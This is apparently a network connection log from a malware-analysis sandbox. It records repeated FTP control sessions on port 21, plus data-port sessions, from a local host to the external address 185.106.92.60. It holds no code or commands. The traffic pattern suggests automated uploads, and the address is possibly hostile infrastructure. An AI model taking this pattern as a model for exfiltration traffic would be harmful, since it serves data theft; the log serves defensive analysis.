                                                                                                                                    Oct 10, 2022 06:02:39.538157940 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.538193941 CEST2149799185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.538340092 CEST4979921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.653883934 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.677445889 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.677576065 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.705559969 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.705619097 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.705775023 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.706285954 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.706356049 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.706478119 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.729924917 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.730175018 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.736031055 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.760328054 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.760492086 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.760642052 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.784620047 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.784743071 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.784905910 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.809485912 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.809729099 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.810156107 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.834111929 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.834331036 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.835320950 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.859873056 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.860004902 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.860333920 CEST4980264566192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.886691093 CEST6456649802185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.886900902 CEST4980264566192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.887187958 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.913005114 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.913261890 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.913677931 CEST4980264566192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.938556910 CEST6456649802185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.939868927 CEST6456649802185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.940032005 CEST4980264566192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.941009998 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.941112041 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.941245079 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:39.964817047 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.965902090 CEST2149801185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:39.965970039 CEST4980121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.107573032 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.131814003 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.131978989 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.159416914 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.159452915 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.159467936 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.159707069 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.159914970 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.184278965 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.184458971 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.184686899 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.209424973 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.209703922 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.209800959 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.234658003 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.234828949 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.235100985 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.259733915 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.260020971 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.261419058 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.291527033 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.291732073 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.293529034 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.318017960 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.318188906 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.318523884 CEST4980464567192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.342645884 CEST6456749804185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.342928886 CEST4980464567192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.343009949 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.368027925 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.368197918 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.368829966 CEST4980464567192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.392823935 CEST6456749804185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.392983913 CEST6456749804185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.393170118 CEST4980464567192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.393338919 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.393407106 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.395029068 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.418698072 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.418714046 CEST2149803185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.418782949 CEST4980321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.561783075 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.588148117 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.588254929 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.618246078 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.618303061 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.618370056 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.618370056 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.618396044 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.618489027 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.618660927 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.643047094 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.643151045 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.643330097 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.667948961 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.668050051 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.670141935 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.695369959 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.695460081 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.695669889 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.721612930 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.721745014 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.731815100 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.757725000 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.757812023 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.758783102 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.782988071 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.783107996 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.783407927 CEST4980664568192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.806931019 CEST6456849806185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.807070971 CEST4980664568192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.807780027 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.832684040 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.832782984 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.835711956 CEST4980664568192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.860203028 CEST6456849806185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.860260010 CEST6456849806185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.860390902 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.860398054 CEST4980664568192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.860466003 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.863825083 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:40.888101101 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.888180971 CEST2149805185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:40.888269901 CEST4980521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.052975893 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.078855991 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.078983068 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.109267950 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.109321117 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.109355927 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.109384060 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.109384060 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.109477997 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.109715939 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.137773991 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.137900114 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.138036966 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.164223909 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.164335012 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.164535999 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.191442966 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.191579103 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.192173004 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.218652964 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.218765020 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.219311953 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.245652914 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.245755911 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.247291088 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.275346041 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.275589943 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.276525021 CEST4980864569192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.299813986 CEST6456949808185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.299927950 CEST4980864569192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.300324917 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.327559948 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.327814102 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.328659058 CEST4980864569192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.351736069 CEST6456949808185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.351788044 CEST6456949808185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.351955891 CEST4980864569192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.354079962 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.354223013 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.366436958 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.392187119 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.392230988 CEST2149807185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.392446041 CEST4980721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.517163038 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.542035103 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.542263031 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.569778919 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.569909096 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.569977045 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.570216894 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.570216894 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.570363045 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.596563101 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.599045038 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.599570036 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.623761892 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.626605988 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.626744032 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.653234005 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.655046940 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.655153990 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.681121111 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.682163000 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.683360100 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.708048105 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.708853960 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.714972019 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.741511106 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.741637945 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.742584944 CEST4981064570192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.765372992 CEST6457049810185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.765588999 CEST4981064570192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.765918016 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.796158075 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.798974991 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.799371958 CEST4981064570192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.823084116 CEST6457049810185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.823414087 CEST6457049810185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.823604107 CEST4981064570192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.824877024 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.825045109 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.832532883 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:41.857271910 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.857342958 CEST2149809185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:41.857508898 CEST4980921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.014041901 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.037115097 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.037293911 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.063823938 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.063899040 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.063930035 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.064076900 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.064517975 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.087198019 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.087472916 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.087728977 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.110472918 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.111063004 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.111511946 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.135133982 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.141181946 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.144129992 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.167795897 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.167960882 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.168450117 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.191103935 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.191323996 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.193418026 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.216571093 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.217010975 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.217542887 CEST4981264572192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.242397070 CEST6457249812185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.242522955 CEST4981264572192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.242854118 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.268162012 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.268945932 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.269398928 CEST4981264572192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.293997049 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.294239044 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.294354916 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.296034098 CEST6457249812185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.296401024 CEST6457249812185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.296614885 CEST4981264572192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.317101002 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.317151070 CEST2149811185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.317300081 CEST4981121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.430809975 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.457355022 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.457720041 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.487421036 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.487473011 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.487512112 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.487602949 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.487687111 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.487895966 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.513267994 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.513401031 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.513614893 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.539134026 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.541053057 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.541121006 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.567553997 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.567709923 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.567800045 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.595582008 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.595834017 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.597135067 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.624211073 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.624373913 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.625473976 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.651922941 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.652122974 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.652225018 CEST4981464573192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.677310944 CEST6457349814185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.677525997 CEST4981464573192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.677685022 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.705373049 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.705634117 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.707133055 CEST4981464573192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.732707977 CEST6457349814185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.732798100 CEST6457349814185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.732995033 CEST4981464573192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.735553026 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.735719919 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.735838890 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.760401011 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.760716915 CEST2149813185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.760854959 CEST4981321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.862901926 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.885909081 CEST2149815185.106.92.60192.168.2.3
